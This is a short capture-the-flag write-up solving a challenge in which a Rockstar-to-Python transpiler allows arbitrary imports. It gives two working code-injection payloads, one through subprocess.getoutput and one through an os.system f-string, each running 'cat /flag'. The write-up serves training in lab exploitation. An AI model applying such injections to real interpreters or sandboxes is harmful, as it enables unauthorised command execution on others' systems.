CTF-writeups

Some CTF writeups


Project maintained by Qyn-CTF

Pwn it like a Rockstar - Baby

Description:

The concept of the Rockstar programming language was written on a beer lid. Such a great start for a new language! Many people adopted the concept and wrote transpiler, interpreter and lexer for this simple, yet great language. Become a certified Rockstar developer today! And pwn the Python transpiler.

First looks

We’re given an application that executes some rockstar code which uses this transpiler.

Solving

We don’t really need to read the source code of the transpiler, we can just fiddle around a bit and see that it accepts import statements, so we can import whatever we want.
Then we can just write some simple rockstar code to call subprocess.getoutput:

import subprocess

Multiply takes Love and Life
Give back Love of Life

Thourough takes Hate and Rough
Give back Hate of Rough

Multiply = subprocess.getoutput
Thourough = eval

Put "cat /flag" into my heart

Say Multiply taking my heart

Which gives us the flag:
CSCG{r0ck_0n_l1ke_a_R0ckpwn3r}

An easier solution is

import os
Say f"{os.system('cat /flag')}"

using python f-strings (Credits to LucasH)

Home